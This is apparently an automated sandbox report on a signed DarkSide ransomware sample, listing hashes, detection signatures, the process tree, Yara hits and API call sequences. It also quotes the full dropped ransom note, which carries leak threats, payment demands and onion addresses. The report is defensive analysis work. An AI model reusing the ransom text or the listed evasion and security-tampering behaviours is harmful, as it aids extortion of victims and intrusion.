
Analysis Report P3FwQWmwUM.exe

Overview

General Information

Sample Name: P3FwQWmwUM.exe
Analysis ID: 411752
MD5: c4da0137cbb99626fd44da707ae1bca8
SHA1: a38e9891152755d9e7fff7386bb5a1bca375bd91
SHA256: 1d4c0b32aea68056755daf70689699200ffa09688495ccd65a0907cade18bd2a
Tags: darkside, OASISCOURTLIMITED, ransomware, signed

Detection

DarkSide
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Multi AV Scanner detection for submitted file
Yara detected DarkSide Ransomware
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to change the wallpaper
Found Tor onion address
Machine Learning detection for sample
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Entry point lies outside standard sections
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files

Startup

  • System is w10x64
  • P3FwQWmwUM.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
  • P3FwQWmwUM.exe (PID: 6020 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
    • P3FwQWmwUM.exe (PID: 1600 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
      • P3FwQWmwUM.exe (PID: 2900 cmdline: C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\ MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
  • svchost.exe (PID: 5964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3996 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5968 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6248 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6356 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6388 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6076 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • notepad.exe (PID: 7048 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\README.2c9ccbf3.TXT
Rule: JoeSecurity_DarkSide
Description: Yara detected DarkSide Ransomware
Author: Joe Security
(1 of 30 entries shown)

Memory Dumps

Rule: JoeSecurity_DarkSide
Description: Yara detected DarkSide Ransomware
Author: Joe Security
Sources (5 of 129 entries shown):
  • 00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmp
  • 00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmp
  • 00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmp
  • 00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmp
  • 00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmp

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: P3FwQWmwUM.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: P3FwQWmwUM.exe | Virustotal: Detection: 45%
Source: P3FwQWmwUM.exe | ReversingLabs: Detection: 62%
Machine Learning detection for sample
Source: P3FwQWmwUM.exe | Joe Sandbox ML: detected
Source: P3FwQWmwUM.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: P3FwQWmwUM.exe | Static PE information: certificate valid
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403EDD wcscat,FindFirstFileExW,wcsrchr,wcscpy,FindNextFileW,FindClose,1_2_00403EDD
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401B91 wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,FindNextFileW,FindClose,RtlFreeHeap,1_2_00401B91
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040409F wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscpy,GetFileAttributesW,RemoveDirectoryW,RtlFreeHeap,DeleteFileW,RtlFreeHeap,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_0040409F
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004066AC wcslen,RtlAllocateHeap,wcscpy,GetFileAttributesW,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscat,GetFileAttributesW,wcsstr,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_004066AC
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403FBA wcscpy,wcscat,FindFirstFileExW,wcscpy,wcscat,FindNextFileW,FindClose,1_2_00403FBA
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403E86 GetLogicalDriveStringsW,GetDriveTypeW,1_2_00403E86

Networking:

Found Tor onion address
Source: strings in P3FwQWmwUM.exe memory, notepad.exe memory and the dropped README.2c9ccbf3.TXT (the onion URLs are those quoted in the ransom note under "Spam, unwanted Advertisements and Ransom Demands")

Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme
Source: C:\README.2c9ccbf3.TXT | Dropped file:

----------- [ Welcome to Dark Side] ------------->

What happend?
----------------------------------------------
Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.
But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.
Follow our instructions below and you will recover all your data.

Data leak
----------------------------------------------
First of all we have uploaded more then 100 GB data.

Example of data:
 - Accounting data
 - Executive data
 - Sales data
 - Customer Support data
 - Marketing data
 - Quality data
 - And more other...

Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
The data is preloaded and will be automatically published if you do not pay.
After publication, your data will be available for at least 6 months on our tor cdn servers.

We are ready:
- To provide you the evidence of stolen data
- To give you universal decrypting tool for all encrypted files.
- To delete all the stolen data.

What guarantees?
----------------------------------------------
We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.
All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.
We guarantee to decrypt one file for free. Go to the site and contact us.

How to get access on website?
----------------------------------------------
Using a TOR browser:
1) Download and install TOR browser from this site: https://torproject.org/
2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

When you open our website, put the following data in the input form:
Key:
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

!!! DANGER !!!
DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.
!!! DANGER !!!
Yara detected DarkSide Ransomware
Source: Yara match | File source: 00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.236181936.00000000007C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.435986395.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.337715138.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.299389052.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.516574687.0000000002DA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478288044.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.282398886.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.303767851.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.439503040.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.298944879.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.307244631.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.442911884.0000000002E08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.295652654.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.428084952.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.288394609.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.408145616.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.330427301.0000000000849000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.306781726.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.292805057.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.281893608.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.483773853.0000000002E39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.297343335.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.282524954.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.433763245.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.288157426.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411401825.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.436219840.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.282409788.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430404279.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.432232782.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.474609577.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.407959058.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.429585276.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.328363880.0000000000849000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.236245311.00000000007C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411912846.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.302439227.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.290040157.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.307472011.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.443960653.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353326118.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.362876492.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.433058006.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.288198091.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.434687514.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.328783962.0000000000849000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.279059079.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411798869.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.293724321.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.408432832.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.509189468.00000000004F8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.456394908.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.347522767.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.411159789.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.410791890.0000000002B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.447874704.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.337437975.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.433675898.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.431227855.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.408616972.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.428965052.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.307770705.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.288409928.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.348924422.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.280790972.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.280803963.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.492039293.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.440558230.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.294802191.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.440164319.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353303558.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.304436022.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.428206439.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.443023882.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.293143940.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.432131880.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.409798220.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.428389024.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.289927003.000000000084C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.328127290.0000000000849000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.493025969.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.368476921.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.429695025.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.448359001.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.304226241.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.483856895.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.293461617.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.410319943.0000000002B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.410677619.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.235019158.0000000000537000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.349425661.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.321323465.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.311791138.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.337762957.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.409162945.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.434752909.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.302198707.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.410205898.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.473912941.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.479859917.0000000002E18000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.439469384.0000000002E08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.295417556.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.456833891.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.294724805.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.480034130.0000000002D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.429089053.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.298539675.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.409597850.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.431347630.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.409312887.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.441657546.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.430481720.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.415984076.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.458381849.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.415652999.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.336753706.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.408806702.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.281911971.000000000084D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: P3FwQWmwUM.exe PID: 5976, type: MEMORY
Source: Yara match | File source: Process Memory Space: P3FwQWmwUM.exe PID: 2900, type: MEMORY
Source: Yara match | File source: Process Memory Space: notepad.exe PID: 7048, type: MEMORY
Source: Yara match | File source: C:\README.2c9ccbf3.TXT, type: DROPPED
Contains functionality to change the wallpaper
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_004033B9 CreateFontW,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,memset,SelectObject,SHGetSpecialFolderPathW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,NtClose,wcscat,RegCreateKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,NtClose,NtClose,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,1_2_004033B9

                      System Summary:

PE file has a writeable .text section
Source: P3FwQWmwUM.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401D45 RegCreateKeyExW,RegQueryValueExW,memcpy,RtlFreeHeap,NtClose,RtlFreeHeap,1_2_00401D45
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040911D CommandLineToArgvW,NtClose,NtClose,RtlFreeHeap,OpenMutexW,NtClose,CreateMutexW,ReleaseMutex,NtClose,NtClose,NtClose,1_2_0040911D
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401EBC NtOpenProcessToken,NtQueryInformationToken,LookupAccountSidW,_wcsicmp,RtlFreeHeap,_wcsicmp,RtlFreeHeap,_wcsicmp,RtlFreeHeap,NtClose,1_2_00401EBC
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00409042 NtSetThreadExecutionState,GetTickCount,GetTickCount,1_2_00409042
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402E44 NtQueryInstallUILanguage,NtQueryDefaultUILanguage,1_2_00402E44
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00408249 memset,RegCreateKeyExW,RegQueryValueExW,RtlAllocateHeap,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_00408249
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405756 NtQuerySystemInformation,RtlAllocateHeap,NtOpenProcess,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00405756
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00408F5B GetProcessId,_swprintf,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,NtClose,1_2_00408F5B
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040625C wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,SetFileAttributesW,CreateFileW,RtlAllocateHeap,ReadFile,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_0040625C
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402160 NtOpenProcessToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,NtAdjustPrivilegesToken,RtlFreeHeap,NtClose,1_2_00402160
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00401B60 NtSetInformationThread,1_2_00401B60
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00408160 RegCreateKeyExW,RegQueryValueExW,RtlAllocateHeap,wcscpy,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_00408160
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405564 RtlAllocateHeap,NtQueryObject,RtlReAllocateHeap,RtlFreeHeap,_wcsicmp,RtlFreeHeap,1_2_00405564
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402367 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,wcscpy,wcscat,wcslen,RtlFreeHeap,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,1_2_00402367
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_0040456A SHGetSpecialFolderPathW,GetTempFileNameW,RtlAllocateHeap,memset,memset,CreateProcessW,WaitForSingleObject,NtClose,NtClose,DeleteFileW,RtlFreeHeap,RtlFreeHeap,1_2_0040456A
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00404878 RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_00404878
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405778 NtQuerySystemInformation,RtlAllocateHeap,NtOpenProcess,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00405778
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00403303 NtOpenProcessToken,NtQueryInformationToken,ConvertSidToStringSidW,wcscpy,RtlFreeHeap,NtClose,1_2_00403303
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00402003 NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,1_2_00402003
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00406C06 wcslen,wcslen,RtlAllocateHeap,wcschr,_swprintf,memset,memset,CreateProcessAsUserW,CreateProcessWithTokenW,CreateProcessW,_swprintf,CreateFileMappingW,ResumeThread,NtClose,RtlFreeHeap,1_2_00406C06
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00408016 RegCreateKeyExW,RegQueryValueExW,RegQueryValueExW,RtlAllocateHeap,wcscpy,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00408016
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00405C1C SetFileAttributesW,CreateFileW,PathIsNetworkPathW,SetFilePointerEx,ReadFile,memcmp,NtClose,1_2_00405C1C
Source: C:\Users\user\Desktop\P3FwQWmwUM.exe | Code function: 1_2_00407B27 GetModuleFileNameW,RtlAllocateHeap,wcslen,wcslen,RtlAllocateHeap,wcscat,wcscat,WaitForMultipleObjects,NtClose,RtlFreeHeap,WaitForMultipleObjects,NtClose,RtlFreeHeap,1_2_00407B27
